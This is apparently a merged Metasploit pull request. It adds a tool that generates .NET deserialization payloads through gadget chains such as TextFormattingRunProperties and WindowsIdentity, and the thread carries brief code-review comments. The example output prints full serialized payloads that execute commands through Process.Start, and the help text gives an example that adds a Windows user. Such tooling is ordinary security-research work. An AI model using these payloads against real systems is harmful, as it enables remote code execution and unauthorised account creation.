### PR TITLE
Add a .NET deserialization tool

### PR DESCRIPTION
**Pull request by zeroSteiner**
This PR adds a new tool that is basically a thin wrapper around the new .NET deserialization library. The goal is to make it easier for module authors to generate serialized payloads for research purposes. The command line arguments (where applicable) are a one-for-one match with [YSoSerial.NET](https://github.com/pwntester/ysoserial.net). Diagnostic messages are printed to stderr so the output is still able to be piped around.

I also added `base64` and `base32` transform types. Base64 is still supported as an encryption type, not sure why since it's not encryption, but I was hoping to support base64 specifically for this tool without messing with the necessary encryption parameters. Base64 was left as an encryption format though.

There's also a tiny change to the SoapFormatter to remove the URI encoding of the library. This currently isn't used by any modules yet, but I noticed while testing that the library name should *not* be URI encoded. This is because it breaks compatibility with Metasploit's `vars_get` and `vars_post` from the HTTP client mixin due to them being double encoded.

## Verification

- [ ] Run `tools/payloads/ysoserial/dot_net.rb -h` and make sure the help menu makes sense
- [ ] Try some difference combinations of `-f` and `-g` to make serialized payloads
    * Note that `TypeConfuseDelegate` is incompatible with the `SoapFormatter`, all other combinations should work just fine

Serialization payload generation is deterministic, with the same parameters the output should always be the same.

## Example
```
[user@localhost]$ ./dot_net.rb -h                    
Usage: ./dot_net.rb [options]

Generate a .NET deserialization payload that will execute an operating system
command using the specified gadget chain and formatter.

Available formatters:
    * BinaryFormatter
    * LosFormatter
    * SoapFormatter

Available gadget chains:
    * TextFormattingRunProperties
    * TypeConfuseDelegate
    * WindowsIdentity

Example: ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TextFormattingRunProperties

Specific options:
    -c, --command   <String>         The command to run
    -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
    -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
    -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
        --list-output-formats        List available output formats, for use with --output
    -h, --help                       Show this message
[user@localhost]$ ./dot_net.rb -c "ping 127.0.0.1" -o base64
Gadget chain: TextFormattingRunProperties
Formatter:    BinaryFormatter
Size:         976
AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA/AM8UmVzb3VyY2VEaWN0aW9uYXJ5IHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOlg9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIiB4bWxuczpTPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiIgeG1sbnM6RD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9c3lzdGVtIj48T2JqZWN0RGF0YVByb3ZpZGVyIFg6S2V5PSIiIE9iamVjdFR5cGU9IntYOlR5cGUgRDpQcm9jZXNzfSIgTWV0aG9kTmFtZT0iU3RhcnQiPjxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz48UzpTdHJpbmc+Y21kPC9TOlN0cmluZz48UzpTdHJpbmc+L2MgcGluZyAxMjcuMC4wLjE8L1M6U3RyaW5nPjwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+PC9PYmplY3REYXRhUHJvdmlkZXI+PC9SZXNvdXJjZURpY3Rpb25hcnk+Cw==
[user@localhost]$ ./dot_net.rb -c "ping 127.0.0.1" -g WindowsIdentity -f SoapFormatter
Gadget chain: WindowsIdentity
Formatter:    SoapFormatter
Size:         3766
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <a1:WindowsIdentity id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
      <System.Security.ClaimsIdentity.actor id="ref-2" xmlns="" xsi:type="xsd:string">AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAABEvYyBwaW5nIDEyNy4wLjAuMQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL</System.Security.ClaimsIdentity.actor>
    </a1:WindowsIdentity>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```

### CODE REVIEW

**Comment by OJ** [comment]
tenor

File: lib/msf/base/simple/buffer.rb [hunk 1]
```diff
@@ -58,6 +58,10 @@ def self.transform(buf, fmt = "ruby", var_name = 'buf', encryption_opts={})
         buf = Rex::Text.to_vbscript(buf, var_name)
       when 'vbapplication'
         buf = Rex::Text.to_vbapplication(buf, var_name)
+      when 'base32'
+        buf = Rex::Text.encode_base32(buf)
```
Comment (wvu-r7) [inline lib/msf/base/simple/buffer.rb:62]: Aww yeah.

File: tools/payloads/ysoserial/dot_net.rb [hunk 2]
```diff
@@ -0,0 +1,132 @@
...
+if __FILE__ == $PROGRAM_NAME
+  driver = YSoSerialDotNet::Driver.new
+  begin
+    driver.run
+  rescue ::Exception => e
+    elog("#{e.class}: #{e.message}\n#{e.backtrace * "\n"}")
+    $stderr.puts "[x] #{e.class}: #{e.message}"
+    $stderr.puts "[*] If necessary, please refer to framework.log for more details."
+  end
+end
```
Comment (wvu-r7) [inline tools/payloads/ysoserial/dot_net.rb:132]: Missing EOF newline. You can just `echo >> tools/payloads/ysoserial/dot_net.rb` and commit that if you want.

**Comment by wvu-r7** [comment]
# Release Notes

This adds the `tools/payloads/ysoserial/dot_net.rb` tool to generate [ysoserial.net](https://github.com/pwntester/ysoserial.net) payloads for .NET deserialization attacks.

**Comment by wvu-r7** [comment]
We'll want to speed up the help time later, a la #9723 (see current implementation in [msfvenom](https://github.com/rapid7/metasploit-framework/blob/master/msfvenom)).

```
wvu@kharak:/rapid7/metasploit-framework:master$ time tools/payloads/ysoserial/dot_net.rb -h > /dev/nullreal	0m3.879s
user	0m2.502s
sys	0m1.312s
wvu@kharak:/rapid7/metasploit-framework:master$
```

I didn't want to move things around too much right now, since the chance of breakage is high.

**Pull request merged**